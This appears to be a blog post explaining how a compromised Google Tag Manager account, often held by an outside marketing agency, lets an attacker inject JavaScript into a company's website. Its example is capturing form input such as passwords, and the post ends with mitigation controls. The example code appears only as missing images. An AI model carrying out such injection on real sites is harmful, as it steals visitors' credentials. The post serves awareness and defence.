Cybersecurity attacks from GTM Google Tags

De -

Andres Mauricio Pardo Agudelo tinpardo@gmail.com

German Hernandez gjhernandezp@gmail.com

 

Introduction.

 

Google Tag Manager GTM is a tool for managing different tags, based on javascript. These tags allow Marketing on advertising platforms such as Facebook Ads, Google Ads, among others.

 

However, it is also possible to create your own tags, which translates into being able to inject java code into the browsers of users who enter a website where GTM is configured and also have access to the GTM account that has been configured. on that website.

 

If the label or the injected javascript code is malicious, an attacker could end up compromising the information and/or computer equipment of users who enter the website, such as: company clients and company employees. The foregoing translates as a possible high-impact cyberattack on a company.

 

Since the attack is not configured from within the company, it does not touch the company's servers or internal infrastructure, therefore it will not leave forensic traces or trigger the cybersecurity controls that have been implemented, therefore it is very difficult to detect it and above all to do a later investigation. This attack can be turned on and off remotely at any time and would allow controlling the equipment of the entire company, third parties, etc.

 

This document aims to show how to carry out a successful attack, the impact analysis and controls that could be applied by companies to minimize the risk of the attack occurring.

 

Risk rating for this attack: Critical

Ease of attack exploitation: Medium

Premises

 

For this type of attack to be successful, the following conditions must be met:

 

• The company to attack must have the GTM tag installed on its website.

• An attacker must be able to compromise a user account with permission to publish tags in GTM of the company to attack, as shown in the following image.

 

 

Description of the Risk in Colombia.

 

Since most large companies in Colombia rely on external Marketing agencies for their sales process, this attack makes it easier to achieve since in most cases the agency staff does not have a level greater training in Cybersecurity and/or work in insecure environments due to the creative nature of their work, where it is necessary to explore tools, sources of information, etc.

 

The foregoing can be used by an attacker to compromise said accounts of advertising agencies that help companies, since these become the weakest link in the chain in Cybersecurity matters despite the fact that companies may carry out a rigorous process of Cybersecurity.

 

On the other hand, if an attacker manages to compromise the accounts of a marketing agency that supports multiple company portals in Colombia, the attack could have devastating impacts on different areas of Colombia or the country that he decides to attack. Thus, marketing companies can become a new target for cyberattacks.

 

In Colombia, most of the websites of large companies (banks, universities, retail, communications companies, restaurants, media, airlines, etc.) use GTM, this type of cyberattack increases both impact and scope.

 

To understand it better and in a single sentence, this attack shows that the marketing area has the power to compromise an entire company and perhaps they are not aware of this, and in most cases they are even supported by marketing agencies that are not aware of it either. They are aware of the power they have over the cybersecurity of the companies they serve.

Example of malicious tags.

 

 

In this basic example we see part of a malicious source code of how an attacker could obtain information every time a user enters information on a field of a form on the website, said field could obtain sensitive information such as username and password, etc.

 

 

 

Next, a trigger is configured so that the malicious source code is used in all the pages of the portal.

 

 

The above example is an example of little use and is only for the purpose of understanding the attack, but it could be done as sophisticated as using ready-made tools like BEEF to have control of the machines. 

 

Graphic description of the attack.

 

 

 

 

 

Example of permissions that allow an attacker to succeed.

 

 

 

EXAMPLES OF SOURCE CODE INJECTED IN SOME WEB SITES

 

Source code injected: 

 




Website Result 1:




 

 

The result of the injection of the website can be seen in the status bar of the website, which in this case refers to another website that could be owned by an attacker.

Website Result 2:

 


 

The result of the injection of the website can be seen in the status bar of the website, which in this case refers to another website that could belong to an attacker.

 

 

MITIGATION CONTROLS

 

To avoid this type of attack, the following controls are suggested:

 

• Increase training for personnel in charge of GTM administration.

• Make use of the “need to know” rule of least privilege granted.

• Implement a review and authorization procedure for GTM administration.

• Monitoring of GTM administration actions.

• External monitoring of portal source code changes.

• Activate physical double authentication mechanisms for GTM administrators.

• Secure the computers of GTM administrators.

Comentarios

Publicar un comentario

Entradas populares de este blog

Por que estamos en panales y expuestos en cuanto a Ciberdefensa?

De -
Hace un par de días vi una noticia de eltiempo.com donde el Sr Presidente Juan Manuel Santos, mencionaba que Colombia se encuentra en panales y expuesta en cuanto a Ciberdefensa, razón por la cual se crea este articulo. Primero que todo quisiera mencionar que desde el ano 2011, en Colombia existe un documento  CONPES 3701 , el cual define los lineamientos de la política para la CiberSeguridad y CiberDefensa con un costo superior a los 16 mil millones de pesos (pag 32 del link), que prácticamente se acaba este ano 2014, 4 anos que no lo digo yo, lo dice el mismísimo Dr Santos públicamente, "estamos en panales en CiberSeguridad y Ciberdefensa",  por lo cual me surge una pregunta: que paso con ese dinero?. Trato de responderla yo mismo y pienso que aunque el CONPES fue una buena intención, no paso de ahi, de una buena intención que no ha servido. 5 Cosas por las que estamos en panales en CiberSeguridad. Copiar y pegar . En Colombia lo que tenemos en materia de CiberSegu...
Leer más

RuCTF

De -
Imagen
Que es un CTF? CTF quiere decir Capture The Flag, o Capture la bandera, donde se trata de atacar a los servicios (apache, FTP, correo, etc) de los otros equipos buscando un código de ciertas características, para enviarlo a un equipo que registra los puntos y así ir ganando puntos, si mis servicios no están online voy perdiendo puntos ya que un robot esta verificando cada ciertos segundos que mis aplicativos estén corriendo. Que diferencia existe entre un WarGame y un CTF? Un WarGame es estatico, o sea no se ataca a nadie, es una serie de retos que hay que solucionar y finalmente enviar una solucion para ir ganando puntos, mientras que en un CTF se ataca a los otros equipos para obtener los puntos, se intenta sacar de linea a los otros equipos para que vayan perdiendo puntos. Que otros CTF existen como RuCTF? En las Vegas, esta el CTF de DEFCON, en donde todo el ano se realizan las eliminatorias y quedan 8 equipos finalistas que realizan el juego final en las Vegas, equipos como la Un...
Leer más

CISM esperando los resultados

De -
Despues de varios meses de esperar el dichoso examen ahora debo esperar 2 mese mas los resultados :)... Que es el CISM? Es una certificacion de Seguridad de la Informacion que se obtiene presentando un examen de 4 horas con 200 preguntas orientadas a perfiles de Gerentes de Seguridad de la Informacion, solo es posible presentar el examen solamente 2 veces al ano. Las preguntas no tienen nada tecnico, o sea de pila tcp, redes, bases de datos, configuraciones linux, nada nada, simplemente preguntas de como se deberian hacer estrategias de seguridad de informacion, como sustentarlas con la alta gerencia, obtener recursos para el area, toma de decisiones en situaciones de desastre, de nuevas implementaciones tecnologicas para que sean seguras, enfin creo que con estos ejemplos ya hay una idea de lo aburrido que es. Para que sirve el CISM y por que lo tome? Bueno finalmente las certificaciones en el mercado sirven para mejorar el empleo y en conferencias para decir que tienes certificacione...
Leer más